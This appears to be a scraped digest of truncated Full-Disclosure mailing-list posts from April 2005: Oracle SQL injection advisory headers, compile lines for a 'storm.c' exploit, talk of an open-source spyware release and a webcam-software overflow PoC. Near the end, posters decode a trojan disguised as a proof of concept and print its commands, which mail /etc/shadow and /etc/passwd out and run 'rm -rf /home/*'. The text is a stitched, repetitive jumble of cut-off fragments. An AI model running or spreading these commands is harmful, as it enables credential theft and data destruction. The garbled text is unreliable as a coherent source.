Notice
I really wonder why the Mozilla Foundation decided to release a serious
security update on a Friday night and to disclose the link to my
proof-of-concept code so quickly. It wasn't intended from my side to release
this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you
Fellows,
Try this:
Linux (Slackware 10):
[EMAIL PROTECTED]:/# gcc -D LINUX storm.c -lpcap -o storm
BSD systems:
[EMAIL PROTECTED]:/# gcc storm.c -lpcap -o storm
It should work; anyway, I'm sending a FreeBSD precompiled version of
this exploit and the C source code as an attachment.
Compiles and runs ok on *BSD and Linux.
No effect on Windows XP SP2 Home/Pro, Linux 2.4/2.6, NetBSD 2.0.2, DragonFly 1.2
No sign of DoS on either side of the connection.
No wonder people you sent the advisory to didn't bother to respond
--
-BEGIN PGP SIGNED MESSAGE-
SUSE Security Announcement
Package:cvs
Announcement-ID:SUSE-SA:2005:024
Date: Monday, Apr
Just mail John Cartwright... and politely ask to be removed.
-KF
Bill Phu wrote:
*sigh* I use [EMAIL PROTECTED] at
https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am
brought to a page that reads:
---Start copy---
Full-Disclosure list: member options for user [EMAIL PROTECTED]
In
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 710-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 18th, 2005
I can confirm that the POC works on 1.0.2 and does not work on 1.0.3.
Michael Scovetta
Computer Associates
Senior Application Developer
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED]
Sent: Monday, April 18, 2005 6:59 AM
To: full-disclosure@lists.grok.org.uk;
Hi,
For a few years now, the number of spyware programs has been growing, but it's
impossible to find a spyware's source code to analyse it and better
understand how they work.
After kruegerware's (and its child's) diffusion, I'm introducing to you the
first open source spyware.
My goal is not to help people writing
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and
DBMS_CDC_ISUBSCRIBE packages
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-02.html
April 18, 2005
Affected Versions: Oracle Database
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits:
lol, I'm not doing a race...
Besides, Agobot is not spyware; it's a backdoor which exploits
RPC/DCOM (MS03-026), RPC/Locator (MS03-001) and WebDAV (MS03-007)
whereas kruegerware and kspyware are real spyware (it's right KSpyware
is not very dangerous, but kruegerware was very dangerous).
PS: I
Searching for security contacts for both Sambar and Surgemail. I've checked over the respective websites and have googled for contact details to no avail.
Cheers!
Jamie
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://netwinsite.com/surgemail/infoq.htm
- Original Message -
From: jamie fisher
To: full-disclosure@lists.grok.org.uk
Sent: Monday, April 18, 2005 3:21 PM
Subject: [Full-disclosure] Security contacts for Sambar server and
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits:
http://www.argeniss.com/research.html
Some exploits and workarounds for vulnerabilities
fixed on Oracle Critical Patch Update April 2005.
http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
(-Don't read if you don't care about Oracle security...)
You think you are secure because
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_METADATA package
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-03.html
April 18, 2005
Affected Versions: Oracle Database Server versions 9i and 10g
Risk
Greetings:
Good attempt ;) But sometimes it works.
---
cat: /etc/shadow: Permiso denegado
No message, no subject; hope that's ok
/bin/rm: no se puede borrar «/home/*»: Permiso denegado
/bin/rm: no se puede borrar «/home/**»: Permiso denegado
/bin/rm: no se puede borrar
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Haxorcitos advisory
---
Application : WheresJames Webcam Publisher
Version : Beta 2.0.0014
Url : www.wheresjames.com
Type : Remote / Local Bof
Author : Miguel Tarascó Acuña - Tarako AT gmail.com
- Tarako AT Haxorcitos.com
Exploit/Poc : Attached
vpBof.c
Description: Binary
On Monday 18 April 2005 at 16:53 -0700, Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us how to hack because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning ! :)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits:
Not that anyone would fall for running this on anything besides a test
system, but to save 30 seconds to decode, what it really does (locally,
not remotely) is:
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
/bin/rm -rf
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it.
Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us how to hack